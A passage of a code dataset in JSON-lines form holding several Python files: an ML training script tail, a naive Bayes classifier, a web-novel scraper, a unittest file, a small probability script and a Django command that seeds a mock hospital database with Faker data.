config.data.use_filtering:\n # Use filter tables to generate subsets.\n # This allows a better control over the number of trained models that.\n # The number of models is independent of the odd ratio. E.g., 10 splits with\n # an odd ratio 0f 0.5 trains 252 models and with an ood ratio of 0.1 only\n # 10. Using filitering we can train 50 models for both of these ood ratios.\n new_train_ds = data.filter_set(\n dataloader=dataloader,\n initial_sample_proportion=config.data.initial_sample_proportion,\n initial_sample_seed=config.data.initial_sample_seed,\n split_proportion=config.data.split_proportion,\n split_id=config.data.split_id,\n split_seed=config.data.split_seed,\n training=True\n )\n val_ds = data.filter_set(\n dataloader=dataloader,\n initial_sample_proportion=config.data.initial_sample_proportion,\n initial_sample_seed=config.data.initial_sample_seed,\n split_proportion=config.data.split_proportion,\n split_id=config.data.split_id,\n split_seed=config.data.split_seed,\n training=False\n )\n else:\n raise ValueError(\n 'In `config.data`, one of `(use_splits, use_filtering)` must be True.')\n\n dataloader.train_ds = new_train_ds\n dataloader.eval_ds['val'] = val_ds\n experiment_name = 'stage_2' if config.train_bias else 'stage_1'\n\n if config.save_train_ids:\n table_name = 'training_ids_table'\n ids = data.get_ids_from_dataset(dataloader.train_ds)\n dict_values = {'example_id': ids}\n df = pd.DataFrame(dict_values)\n df.to_csv(os.path.join(output_dir, table_name + '.csv'), index=False)\n # Apply batching (must apply batching only after filtering)\n dataloader = data.apply_batch(dataloader, config.data.batch_size)\n\n _ = train_lib.train_and_evaluate(\n train_as_ensemble=config.train_stage_2_as_ensemble,\n dataloader=dataloader,\n model_params=model_params,\n num_splits=config.data.num_splits,\n ood_ratio=config.data.ood_ratio,\n output_dir=output_dir,\n experiment_name=experiment_name,\n save_model_checkpoints=config.training.save_model_checkpoints,\n save_best_model=config.training.save_best_model,\n early_stopping=config.training.early_stopping,\n ensemble_dir=FLAGS.ensemble_dir,\n example_id_to_bias_table=example_id_to_bias_table,\n vizier_trial_name=FLAGS.trial_name,\n is_vertex=FLAGS.is_vertex,\n )\n\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"google-research/skai","sub_path":"src/skai/model/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8492,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"31"} +{"seq_id":"13514641458","text":"import numpy as np\nimport math\nimport pandas as pd\n\nstring1_prob1 = 0\nstring1_prob2 = 0\nstring2_prob1 = 0\nstring2_prob2 = 0\n\ndef parse_data(filepath):\n file = pd.read_csv(filepath, sep = '\\t', header = None)\n main_data = file.as_matrix()\n return main_data\n\ndef calc_std(main_data, data, mean, strings):\n deviations = []\n if strings == []:\n for i in range(0, main_data.shape[1]-1):\n dev = math.sqrt(np.sum([np.power(k-mean[i],2) for k in data[:,i]])/len(data))\n deviations.append(dev)\n else:\n for i in range(0,strings[0]):\n dev = math.sqrt(np.sum([np.power(k - mean[i], 2) for k in data[:, i]]) / len(data))\n deviations.append(dev)\n deviations.append(1)\n for i in range(strings[0]+1, main_data.shape[1]-1):\n dev = math.sqrt(np.sum([np.power(k - mean[i], 2) for k in data[:, i]]) / len(data))\n deviations.append(dev)\n return deviations\n\ndef post_prob(main_data, mean, std_dev, data, strings):\n post = []\n if strings == []:\n for i in range(0, len(data)-1):\n e = np.exp(-np.power((data[i]-mean[i]),2)/(2*np.power(std_dev[i],2)))\n pd = (1/(np.sqrt(2*np.pi)*std_dev[i])) * e\n post.append(pd)\n else:\n for i in range(0, strings[0]):\n e = np.exp(-np.power((data[i] - mean[i]), 2) / (2 * np.power(std_dev[i], 2)))\n pd = (1 / (np.sqrt(2 * np.pi) * std_dev[i])) * e\n post.append(pd)\n post.append(1)\n for i in range(strings[0]+1, main_data.shape[1]-1):\n e = np.exp(-np.power((data[i] - mean[i]), 2) / (2 * np.power(std_dev[i], 2)))\n pd = (1 / (np.sqrt(2 * np.pi) * std_dev[i])) * e\n post.append(pd)\n return post\n\n\ndef nb(main_data, train_data, test_data, test_labels, strings):\n prediction = []\n rows = main_data.shape[0]\n cols = main_data.shape[1]\n class0 = []\n class1 = []\n for i in range(0,len(train_data)):\n class1.append(train_data[i]) if train_data[i][cols-1] == 1 else class0.append(train_data[i])\n class0 = np.array(class0)\n class1 = np.array(class1)\n c0row = class0.shape[0]\n c1row = class1.shape[0]\n trshape = train_data.shape[0]\n means0 = []\n means1 = []\n if strings == []:\n for i in range(0,main_data.shape[1]-1):\n mean0 = np.mean(class0[:,i])\n mean1 = np.mean(class1[:,i])\n means0.append(mean0)\n means1.append(mean1)\n else:\n for i in range(0, strings[0]):\n mean0 = np.mean(class0[:, i])\n mean1 = np.mean(class1[:, i])\n means0.append(mean0)\n means1.append(mean1)\n means0.append(1)\n means1.append(1)\n for i in range(strings[0]+1, main_data.shape[1]-1):\n mean0 = np.mean(class0[:, i])\n mean1 = np.mean(class1[:, i])\n means0.append(mean0)\n means1.append(mean1)\n #print(len(means0), len(means1))\n std_dev0 = calc_std(main_data, class0, means0, strings)\n std_dev1 = calc_std(main_data, class1, means1, strings)\n #print(len(std_dev0), len(std_dev1))\n cat_data = []\n a = b = c = d = 0\n if strings != []:\n for j in strings:\n for i in range(0,len(class0)):\n if class0[i][j] not in cat_data:\n cat_data.append(class0[i][j])\n for j in strings:\n for i in range(0, len(class0)):\n if class0[i,j] == cat_data[1]:\n a += 1\n elif class0[i,j] == cat_data[0]:\n b += 1\n string1_prob1 = a/(len(class0))\n string2_prob1 = b/(len(class0))\n for i in range(0, len(class1)):\n if class1[i,j] == cat_data[1]:\n c += 1\n elif class1[i,j] == cat_data[0]:\n d += 1\n string1_prob2 = c/(len(class1))\n string2_prob2 = d/(len(class1))\n #print(string2_prob2)\n test_label = []\n ground_truth = []\n pp0 = c0row/trshape\n pp1 = c1row/trshape\n for i in range(0, len(test_data)):\n ground_truth.append(test_data[i][cols-1])\n post_prob1 = post_prob(main_data, means0, std_dev0, test_data[i], strings)\n post_prob2 = post_prob(main_data, means1, std_dev1, test_data[i], strings)\n post1 = np.prod(post_prob1, axis = None)\n post2 = np.prod(post_prob2, axis = None)\n if strings != []:\n if test_data[i][strings[0]] == cat_data[1]:\n class_post1 = post1 * pp0 * string1_prob1\n class_post2 = post2 * pp1 * string1_prob2\n elif test_data[i][strings[0]] == cat_data[0]:\n class_post1 = post1 * pp0 * string2_prob1\n class_post2 = post2 * pp1 * string2_prob2\n else:\n class_post1 = post1 * pp0\n class_post2 = post2 * pp1\n test_label.append(0) if class_post1 > class_post2 else test_label.append(1)\n return metrics(test_label, ground_truth)\n\ndef metrics(ground_truth, prediction):\n tp = 0\n tn = 0\n fp = 0\n fn = 0\n for i in range(len(ground_truth)):\n if int(ground_truth[i]) == prediction[i] == 1:\n tp += 1\n if int(ground_truth[i]) == prediction[i] == 0:\n tn += 1\n if int(ground_truth[i]) != prediction[i]:\n if int(ground_truth[i]) == 0:\n fp += 1\n if int(ground_truth[i]) != prediction[i]:\n if int(ground_truth[i]) == 1:\n fn += 1\n accuracy, precision, recall, f1 = float(tn + tp)/len(ground_truth), float(tp)/float(tp + fp), float(tp)/float(tp + fn), (2*tp)/((2*tp)+fn+fp)\n return accuracy, precision, recall, f1\n\ndef kfold(k, data, string_col):\n rows = data.shape[0]\n cols = data.shape[1]\n totalAccuracy = 0\n totalPrecision = 0\n totalRecall = 0\n totalF1 = 0\n fold = math.ceil(data.shape[0]/10)\n #print(fold)\n for i in range(0, k):\n test_data = data[i*fold:i*fold+fold,:]\n train_data = np.delete(data, np.s_[i*fold:i*fold + fold],0)\n test_labels = data[fold*(i-1):fold*i,-1]\n accuracy, recall, precision, f1 = nb(data, train_data, test_data, test_labels, string_col)\n totalAccuracy += accuracy\n totalPrecision += precision\n totalRecall += recall\n totalF1 += f1\n print(\"Accuracy after k fold validation: \" ,totalAccuracy*100/fold)\n print(\"Precision after k fold validation: \" ,totalPrecision*100/fold)\n print(\"Recall after k fold validation: \" ,totalRecall*100/fold)\n print(\"F measure after k fold validation: \" ,totalF1*100/fold)\n\ndef main():\n main_data = parse_data('../data/dataset2.txt')\n string_col = []\n for i in range(0,main_data.shape[1]):\n try:\n main_data[0][i] == float(main_data[0][i])\n except:\n string_col.append(i)\n #print(string_col)\n kfold(10,main_data, string_col)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"amitthere/classification-algorithms","sub_path":"code/nb.py","file_name":"nb.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72118748888","text":"# This is a sample Python script.\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport json\nfrom utils import get_data_path, get_novels_path\nfrom novelparse import NovelParse\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom functools import reduce\nfrom multiprocessing import Pool\nimport numpy as np\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\nwebHead = 'http://www.87shuwu.info'\n\ndef get_novels():\n # Use a breakpoint in the code line below to debug your script.\n # print(f'Hi, {name}') # Press ⌘F8 to toggle the breakpoint.\n novels = [{'name': '大明天下', 'url': 'http://www.87shuwu.info/2/2643/'}]\n for novel in novels:\n print('下载小说%s, 链接: %s' % (novel['name'], novel['url']))\n novel_html = requests.get(novel['url'])\n tempPath = os.path.join(get_data_path(), 'temp.html')\n with open(tempPath, 'w+') as file:\n file.write(novel_html.text)\n soup = BeautifulSoup(novel_html.text, 'lxml')\n\ndef parsenovel(novel, dictJson):\n print('下载小说%s, 链接: %s' % (novel['name'], novel['url']))\n parser = NovelParse(webHead, novel, dictJson, 0)\n parser.parsePage(novel['url'], True)\n print('Novel %s download complete' % novel['name'])\n\ndef parse_novels1(novels):\n dictPath = os.path.join(get_data_path(), 'dict.json')\n dictJson = {}\n try:\n with open(dictPath, 'r') as file:\n dictArray = json.load(file)\n for item in dictArray:\n dictJson[item[0]] = item[1]\n except Exception as e:\n print('Read dict json file erropr: ' + str(e))\n\n for novel in novels:\n parsenovel(novel, dictJson)\n\ndef parse_novels(novels):\n pool = Pool(4)\n # tempPath = os.path.join(get_data_path(), 'temp.html')\n dictPath = os.path.join(get_data_path(), 'dict.json')\n dictJson = {}\n try:\n with open(dictPath, 'r') as file:\n dictArray = json.load(file)\n for item in dictArray:\n dictJson[item[0]] = item[1]\n except Exception as e:\n print('Read dict json file erropr: ' + str(e))\n for novel in novels:\n pool.apply_async(parsenovel, args=(novel, dictJson))\n # with open(tempPath, 'r') as file:\n # context = file.read()\n # soup = BeautifulSoup(context, 'lxml')\n # charpertext = format('%s章节列表' % novel['name'])\n # heads = soup.find('h4', text=charpertext)\n # charpers = heads.parent.find_next_sibling('div')\n # chaperlist = charpers.find_all('a')\n # for item in chaperlist:\n # print('href: %s chaper name: %s' % (item.get('href'), item.text))\n # firstPage = soup.find('a', class_='indexPage')\n # endPage = soup.find('a', class_='endPage')\n # firstId = firstPage.get('href')[0: -1].split('_')\n # endId = endPage.get('href')[0: -1].split('_')\n # for i in range(int(firstId[1]), int(endId[1])):\n # href = format('%s_%s' % (firstId[0], i))\n # print(href)\n # print(heads)\n pool.close()\n pool.join()\n print('Complete')\n\ndef parseFilterNovels(pageUrl):\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n page = requests.get(pageUrl, headers=headers)\n soup = BeautifulSoup(page.text, 'lxml')\n bd1 = soup.find('div', class_='bd')\n items = bd1.find_all('div', class_='right')\n novels = []\n for item in items:\n nameItem = item.find('a')\n words = item.find('span', class_='words')\n if int(words.text.split(':')[1]) > 200000 and '绿' not in nameItem.text:\n novels.append({'name': nameItem.text, 'url': webHead + nameItem.get('href')})\n print('Page %s get novel %d' % (pageUrl, len(novels)))\n return novels\n\ndef parseFilterNovelPages(baseUrl, prefix, name):\n # baseUrl = 'http://www.87shuwu.info/shuku/7-lastupdate-0-1.html'\n # 完本小说 http://www.87shuwu.info/shuku/0-lastupdate-2-1.html\n # novelPath = os.path.join(get_data_path(), 'novels.html')\n page = requests.get(baseUrl)\n soup = BeautifulSoup(page.text, 'lxml')\n endPage = soup.find('a', class_='endPage')\n endHref = endPage.get('href')\n endIndex = endHref.split('.')[0].split('-')\n novels = []\n threadPool = ThreadPoolExecutor(max_workers=16, thread_name_prefix='novel_filter')\n tasks = [threadPool.submit(parseFilterNovels, (prefix + str(i) + '.html')) for i in range(1, int(endIndex[-1]) + 1)]\n for future in as_completed(tasks):\n novels.extend(future.result())\n # for i in range(1, int(endIndex[-1]) + 1):\n # pageUrl = prefix + str(i) + '.html'\n # pageNovels = parseFilterNovels(pageUrl)\n # novels.extend(pageNovels)\n # if i % 10 == 0:\n # print('parse page: %d' % i)\n # novelPath = os.path.join(get_data_path(), name + '.json')\n # with open(novelPath, 'w') as file:\n # file.write(json.dumps(novels))\n novelPath = os.path.join(get_data_path(), name + '.json')\n with open(novelPath, 'w') as file:\n file.write(json.dumps(novels))\n # firstPage = BeautifulSoup(requests.get(baseUrl).text, 'lxml')\n\ndef mergeNovelsName():\n names = []\n # with open(os.path.join(get_data_path(), '小说.json'), 'r') as file:\n # names.extend(json.load(file))\n # names = list(filter(lambda x: '玄幻灵异' not in x['name'] and '古代架空' not in x['name'] and '网游竞技' not in x['name'], names))\n # with open(os.path.join(get_data_path(), '小说.json'), 'w') as file:\n # file.write(json.dumps(names))\n\n for filename in ['完本小说.json', '连载小说.json']:\n filepath = os.path.join(get_data_path(), filename)\n with open(filepath, 'r') as file:\n names.extend(json.load(file))\n def nameCheck(name):\n removeContext = ['CP', 'BL', 'NTR', '玄幻灵异', '绿', '古代架空', '网游竞技', '妻', '穿越重生', '近代现代', '无限流派', '古代架空']\n for item in removeContext:\n if item in name:\n return False\n return True\n names = list(filter(lambda x: nameCheck(x['name']), names))\n s = set()\n newNames = []\n for name in names:\n if name['name'] in s:\n continue\n else:\n newNames.append(name)\n s.add(name['name'])\n with open(os.path.join(get_data_path(), '小说.json'), 'w') as file:\n file.write(json.dumps(newNames))\n\ndef mergeNovels():\n list_dirs = os.walk(get_data_path())\n novelsPath = get_novels_path()\n for root, dirs, _ in list_dirs:\n for d in dirs:\n if 'img' in d:\n continue\n sub_dirs = os.walk(os.path.join(root, d))\n charpers = []\n for sub_root, _, files in sub_dirs:\n for file in files:\n file_path = os.path.join(root, d, file)\n index = file.split('.')[-2].split('_')[-1]\n with open(file_path, 'r') as f:\n charpers.append({'context': f.read(), 'index': int(index)})\n charpers.sort(key=lambda x: x['index'])\n result = reduce(lambda pre, item: pre + item['context'], charpers, '')\n save_path = os.path.join(novelsPath, d + '.txt')\n with open(save_path, 'w') as file:\n file.write(result)\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n # mergeNovelsName()\n # mergeNovels()\n # parseFilterNovelPages('http://www.87shuwu.info/shuku/7-lastupdate-0-1.html', 'http://www.87shuwu.info/shuku/7-lastupdate-0-', '连载小说')\n # parseFilterNovelPages('http://www.87shuwu.info/shuku/0-lastupdate-2-1.html',\n # 'http://www.87shuwu.info/shuku/0-lastupdate-2-', '完本小说')\n novels = []\n with open(os.path.join(get_data_path(), '小说.json'), 'r') as file:\n novels = json.load(file)\n novelBase = get_novels_path()\n for _, _, files in os.walk(novelBase):\n names = []\n for file in files:\n names.append(file.split('.')[0])\n print('before: %d' % len(novels))\n novels = list(\n filter(lambda x: x['name'] not in names, novels))\n print('end: %d' % len(novels))\n # dictPath = os.path.join(get_data_path(), 'dict.json')\n # try:\n # with open(dictPath, 'r') as file:\n # dictJson = json.load(file)\n # file.close()\n # dictJson = sorted(dictJson.items(), key=lambda x: x[0])\n # with open(dictPath, 'w') as file:\n # file.write(json.dumps(dictJson))\n # except Exception as e:\n # print('Read dict json file erropr: ' + str(e))\n parse_novels(novels)\n # parse_novels1(novels)\n # get_novels()\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"lhyfcs/novel_reptile","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1906441421","text":"#!/usr/bin/env python\nimport unittest\nfrom manager_api import *\n\nclass Test_meeting(unittest.TestCase):\n\tdef test_db_control(self):\n\t\tadd = Add_meeting(title='ddhg',content='b',leader='c',meeting_time='d')\n\t\tupdate = Update_meeting(1,'title','x')\n\t\tdel_meeitng = Del_meeting(1)\n\t\tsearchall = Search_meetings()\n\t\tself.assertEquals(add,True)\n\t\tself.assertEquals(update,True)\n\t\tself.assertEquals(del_meeting,True)\n\t\tself.assertTrue(isinstance(searchall,dict))\n\tdef testerror(self):\n\t\twith self.assertRaises(TypeError):\n\t\t\tAdd_meeting('abd','e','f','g')\n\t\tAdd_meeting(title='ddhg',content='b',leader='c',meeting_time='d')\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\tAdd_meeting(title='ddh',content='c',leader='d',meeting_time='f')\n\t\twith self.assertRaises(sqlalchemy.exc.InvalidRequestError):\n\t\t\tUpdate_meeting(99,'title','x')\n\t\twith self.assertRaises(orm_exc.NoResultFound):\n\t\t\tLook_patteners('x')\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"xingmin860818/myobject-master","sub_path":"meeting_v2/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4155224845","text":"import numpy as np\nfrom scipy.stats import rv_discrete\n\nnum_of_balls_returned = np.array([0, 0, 1, 0, 0, 30, 20, 7, 6, 26, 54, 14, 22, 11, 6, 5, 38, 25, 15, 9, 16])\nnum_of_balls_thrown = np.array([20, 30, 20, 55, 57, 36, 25, 17, 16, 29, 55, 17, 25, 22, 36, 25, 98, 45, 25, 15, 25])\nprint(num_of_balls_returned / num_of_balls_thrown)\ntemp = 1 - (num_of_balls_returned / (num_of_balls_thrown+1))\n\n\nr_spin = rv_discrete(name='r_spin', values=([-2, -1, 0, 1, 2], temp[:5]/np.sum(temp[:5])))\nprint(temp[:5]/np.sum(temp[:5]))\nr_freq = rv_discrete(name='r_freq', values=([0, 1, 2], temp[5:8]/np.sum(temp[5:8])))\nprint( temp[5:8]/np.sum(temp[5:8]))\nr_speed = rv_discrete(name='r_speed', values=([1, 2, 3], temp[8:11]/np.sum(temp[8:11])))\nprint(temp[8:11]/np.sum(temp[8:11]))\nr_dir = rv_discrete(name='r_dir', values=([-2, -1, 0, 1, 2], temp[11:16]/np.sum(temp[11:16])))\nprint(temp[11:16]/np.sum(temp[11:16]))\nr_lau_ang = rv_discrete(name='r_lau_ang', values=([-2, -1, 0, 1, 2], temp[16:21]/np.sum(temp[16:21])))\nprint(temp[16:21]/np.sum(temp[16:21]))\n","repo_name":"kkaya674/AntiaTech","sub_path":"Control Algoritm/deneme_dosyasi.py","file_name":"deneme_dosyasi.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39770827528","text":"import os\nimport shutil\nimport random\nfrom datetime import datetime\n\nfrom django.core.management.base import BaseCommand\nfrom django.core.management import call_command\nfrom faker import Faker\nfrom faker_biology.physiology import Organ\nfrom faker_biology.taxonomy import ModelOrganism\nfrom faker_biology.mol_biol import Enzyme\nfrom faker_biology.bioseq import Bioseq\n\nfrom hospital.models.actions import Consultation, Perscriptions, Surgery\nfrom hospital.models.places import Unit, Bed, Room\nfrom hospital.models.people import (\n Person,\n Nurse,\n Patient,\n Physician,\n Surgeon,\n get_chief_of_staff,\n)\nfrom hospital.models.illnesses import Medication, Illness, Allergy, Interactions\nfrom hospital.models.skill_types import Skills, AssignedSkills, SurgeryType\nfrom hospital import constants\n\nfrom dbmgmt.settings import BASE_DIR\n\nfake = Faker()\n# Add some extra faker for illnesses and medicine\nfake.add_provider(Organ) # Allows fake.organ()\nfake.add_provider(ModelOrganism) # fake.organism_latin() sounds like illness enough\nfake.add_provider(Enzyme) # fake.organism_latin() sounds like medicine enough\nfake.add_provider(Bioseq) # fake.organism_latin() sounds like medicine enough\n\nTOTAL_ROOMS = 25\nTOTAL_PATIENTS = 100\nTOTAL_PHYSICIANS = 15\nTOTAL_SURGEONS = 15\nTOTAL_NURSES = 12\n\nclass Command(BaseCommand):\n help = 'Deletes current and recreates the mock database'\n\n def reset_db(self):\n # Verify migrations are made and db gets them\n try:\n os.remove(f\"{BASE_DIR}/db.sqlite3\")\n except FileNotFoundError:\n pass\n shutil.rmtree(f\"{BASE_DIR}/hospital/migrations\", ignore_errors=True)\n call_command(\"makemigrations\", \"hospital\")\n call_command(\"makemigrations\")\n call_command(\"migrate\", \"hospital\")\n call_command(\"migrate\")\n\n def populate_constants(self):\n \"\"\" Populate constants into their own tables \"\"\"\n\n # Creating entire skills table\n for skill, _ in constants._SURGICAL_SKILLS:\n s = Skills(name=skill)\n s.save()\n print(\"Created skill of\", s)\n\n # Surgery types made of skills\n def create_type(name, skills: list):\n stype = SurgeryType(name=name)\n stype.save()\n for skill in skills:\n stype.requirements.add(Skills.objects.get(name=skill))\n stype.save()\n print(f\"Created SurgeryType of {stype}\")\n\n create_type(\"general_surgery\", [\"transplant\", \"wound\"])\n create_type(\"neurosurgery\", [\"brain\", \"head_trauma\"])\n create_type(\"cardiac_surgery\", [\"cardiac_arrest\", \"heart_valve\"])\n create_type(\"plastic_surgery\", [\"rhinoplasty\", \"facelift\"])\n\n # Create all beds and such\n for code, name in constants._UNITS:\n u = Unit(name=name, prefix=code)\n u.save()\n\n # Give all units 50 rooms\n for i in range(1, TOTAL_ROOMS):\n r = Room(number=i, unit=u)\n r.save()\n\n Bed(room=r, bed_letter=\"A\").save()\n Bed(room=r, bed_letter=\"B\").save()\n # Give even sides 3 beds, odd 2\n if i%2==0:\n Bed(room=r, bed_letter=\"C\").save()\n\n def create_neurosurgeon(self):\n \"\"\" Creates a neurosurgeon and makes sure he can perform \"\"\"\n # Create neuro\n neurosurgeon = Surgeon(\n first_name=\"Joan\",\n last_name=\"Neuro\",\n dob=datetime(1970, 2, 2),\n gender=\"F\",\n address=\"10 Brain Lane\",\n phone=\"1298763490\",\n contract_length=5,\n contract_type=\"Per Surgery\",\n ssn=fake.ssn()\n )\n neurosurgeon.save()\n\n # Give neurosurgeon the right skills\n neuro_skills = [\"brain\", \"head_trauma\"]\n for skill in neuro_skills:\n # User will be presented these in view\n skill_instance = Skills.objects.get(name=skill)\n\n # Add skill to surgeon\n AssignedSkills(person=neurosurgeon, skill=skill_instance).save()\n\n # Should be good here\n neurosurgury = SurgeryType.objects.get(name=\"neurosurgery\")\n if neurosurgeon.can_perform(neurosurgury):\n print(\"Created Neurosurgeon that can perform Neurosurgery\")\n else:\n raise RuntimeError(\"Hmm.. Check into can_perform method..\")\n\n return neurosurgeon\n\n def create_plastic_surgeon(self):\n \"\"\" Creates a plastic and makes sure he can perform \"\"\"\n # Create surgeon\n plastic_surgeon = Surgeon(\n first_name=\"P.\",\n last_name=\"Lastic\",\n dob=datetime(1965, 3, 3),\n gender=\"M\",\n address=\"10 Botox Ave\",\n phone=\"8760981234\",\n contract_length=3,\n contract_type=\"Per Surgery\",\n ssn=fake.ssn()\n )\n plastic_surgeon.save()\n\n # Give neurosurgeon the right skills\n plastic_skills = [\"rhinoplasty\", \"facelift\"]\n for skill in plastic_skills:\n # User will be presented these in view\n skill_instance = Skills.objects.get(name=skill)\n\n # Add skill to surgeon\n AssignedSkills(person=plastic_surgeon, skill=skill_instance).save()\n\n # Double check he can do whats expected\n plastic = SurgeryType.objects.get(name=\"plastic_surgery\")\n neuro = SurgeryType.objects.get(name=\"neurosurgery\")\n if plastic_surgeon.can_perform(plastic):\n print(\"Created Plastic Surgeon that can perform Plastic Surgery\")\n else:\n raise RuntimeError(\"Hmm.. Check into can_perform method..\")\n\n # Verify he can't do neuro\n if plastic_surgeon.can_perform(neuro):\n raise(\"Nope, plastic surgeon shouldn't be able to do Neurosurgery\")\n\n return plastic_surgeon\n\n def create_plastic_nurse(self):\n \"\"\" Creates a plastic nurse\"\"\"\n # Create surgeon\n nurse = Nurse(\n first_name=\"Ken\",\n last_name=\"Plasty\",\n dob=datetime(1965, 3, 3),\n gender=\"M\",\n address=\"10 Botox Ave\",\n phone=\"8760981234\",\n salary=120_000,\n ssn=fake.ssn(),\n grade=\"a\",\n years_of_experience=5,\n )\n nurse.save()\n\n # Give nurse plastic surgery skill\n skill_instance = Skills.objects.get(name=\"facelift\")\n\n # Add skill to Nurse\n AssignedSkills(person=nurse, skill=skill_instance).save()\n\n # Double check he can do whats expected\n plastic = SurgeryType.objects.get(name=\"plastic_surgery\")\n neuro = SurgeryType.objects.get(name=\"neurosurgery\")\n if nurse.can_perform(plastic):\n print(\"Created Plastic Surgery Nurse to assist\")\n else:\n raise RuntimeError(\"Hmm.. Check into can_perform method..\")\n\n # Verify he can't do neuro\n if nurse.can_perform(neuro):\n raise(\"Nope, plastic Nurse shouldn't be able assist in Neurosurgery\")\n\n return nurse\n\n def create_general_physician(self):\n phys = Physician(\n specialty=\"general\",\n salary=150_000,\n first_name=\"Al\",\n last_name=\"Gener\",\n dob=datetime(1940, 5, 5),\n gender=\"M\",\n address=\"123 General Way\",\n phone=fake.phone_number(),\n ssn=fake.ssn(),\n )\n phys.save()\n print(f\"Created Physician of '{phys}'\")\n return phys\n\n def create_optomotrist(self):\n phys = Physician(\n specialty=\"optometry\",\n salary=180_000,\n first_name=\"Cornealeus\",\n last_name=\"John\",\n dob=datetime(1945, 5, 5),\n gender=\"M\",\n address=\"123 Eye Ct\",\n phone=fake.phone_number(),\n ssn=fake.ssn(),\n )\n phys.save()\n print(f\"Created Optomotrist of '{phys}'\")\n return phys\n\n def create_general_patient(self):\n patient = Patient(\n first_name=\"Pat\",\n last_name=\"Entman\",\n dob=datetime(1980, 5, 5),\n gender=\"M\",\n address=\"123 Patient Dr\",\n phone=fake.phone_number(),\n ssn=fake.ssn(),\n blood_type=\"op\",\n blood_sugar=\"12\",\n cholesterol_hdl=\"6\",\n cholesterol_ldl=\"5\",\n cholesterol_tri=\"8\",\n )\n patient.save()\n print(f\"Created Patient of '{patient}'\")\n return patient\n\n def create_medication1(self):\n medication1 = Medication(\n name = \"Tylenol\",\n code = 1001,\n available_qnty = 35,\n cost = 4.5,\n usage = \"\"\" Acetaminophen is used to relieve mild to moderate pain from headaches,\n muscle aches, menstrual periods, colds and sore throats, toothaches,\n and to reduce fever.\"\"\"\n )\n medication1.save()\n print(f\"Created Medication of '{medication1}'\")\n return medication1\n\n def create_medication2(self):\n medication2 = Medication(\n name = \"Advil\",\n code = 1002,\n available_qnty = 46,\n cost = 6.25,\n usage = \"\"\" Ibuprofen is used to relieve pain from various conditions such as headache,\n dental pain, menstrual cramps, muscle aches, or arthritis. It is also used to reduce fever\n and to relieve minor aches and pain due to the common cold or flu.\"\"\"\n )\n medication2.save()\n\n for _ in range(15):\n m = Medication(\n name=fake.amino_acid().full_name,\n code=random.randint(1000, 2000),\n available_qnty=random.randint(1,100),\n cost=float(random.randint(0,10)),\n usage=fake.paragraph(nb_sentences=5)\n )\n m.save()\n print(f\"Created Medication of '{medication2}'\")\n return medication2\n \n def create_medication_interaction(self):\n for _ in range(20):\n med1 = Medication.objects.order_by('?').first()\n med2 = Medication.objects.order_by('?').first()\n if (med1.pk != med2.pk):\n try:\n i = Interactions(medication1= med1, medication2 = med2, severity = 'm')\n i.save()\n except:\n pass\n\n\n def create_many_nurses(self):\n \"\"\" Each nurse needs at least 5 patients \"\"\"\n for i in range(TOTAL_NURSES):\n first = fake.first_name()\n n = Nurse(\n first_name=first,\n last_name=fake.last_name(),\n dob=fake.date(),\n gender=\"M\" if 'e' in first else \"F\",\n address=fake.address(),\n phone=fake.phone_number(),\n ssn=fake.ssn(),\n grade=constants.NURSE_GRADES[random.randint(0, len(constants.NURSE_GRADES))-1][0],\n years_of_experience=random.randint(1,15),\n salary=random.randint(60_000, 180_000)\n )\n n.save()\n\n def create_many_patients(self):\n \"\"\" Create a bunch of patients \"\"\"\n for i in range(TOTAL_PATIENTS):\n first = fake.first_name()\n p = Patient(\n first_name=first,\n last_name=fake.last_name(),\n dob=fake.date(),\n gender=\"M\" if 'a' in first else \"F\",\n address=fake.address(),\n phone=fake.phone_number(),\n ssn=fake.ssn(),\n blood_type=\"an\",\n blood_sugar=1.0,\n cholesterol_hdl=2.0,\n cholesterol_ldl=3.0,\n cholesterol_tri=4.0,\n )\n p.save()\n # Randomly admit some\n if random.randint(0, 1):\n p.bed = Bed.objects.filter(patient__isnull=True).order_by(\"?\").first()\n p.assigned_nurse = Nurse.objects.order_by(\"?\").first()\n p.save()\n\n # Randomly give some illnesses\n if random.randint(0, 1):\n name = fake.enzyme()\n illness = Illness(\n name=name,\n illness_code=\"\".join([word[0] for word in name.split(\" \")]),\n description=fake.paragraph(nb_sentences=5)\n )\n illness.save()\n p.illnesses.add(illness)\n p.save()\n\n # Randomly give some allergies\n if random.randint(0, 1):\n name = fake.enzyme()\n allergy = Allergy(\n name=name,\n allergy_code=\"\".join([word[0] for word in name.split(\" \")]),\n description=fake.paragraph(nb_sentences=5)\n )\n allergy.save()\n p.allergies.add(allergy)\n\n p.save()\n per = Perscriptions(\n physician=Physician.objects.order_by(\"?\").first(),\n patient=p,\n medication=Medication.objects.order_by(\"?\").first(),\n frequency=f\"Take {random.randint(1,3)} daily\",\n dosage=f\"{random.randint(100, 500)} mg\"\n )\n per.save()\n\n if random.randint(0, 1):\n stype = SurgeryType.objects.order_by(\"?\").first()\n eligable_nurses = [n for n in Nurse.objects.all() if n.can_perform(stype)]\n eligable_surgeons = [s for s 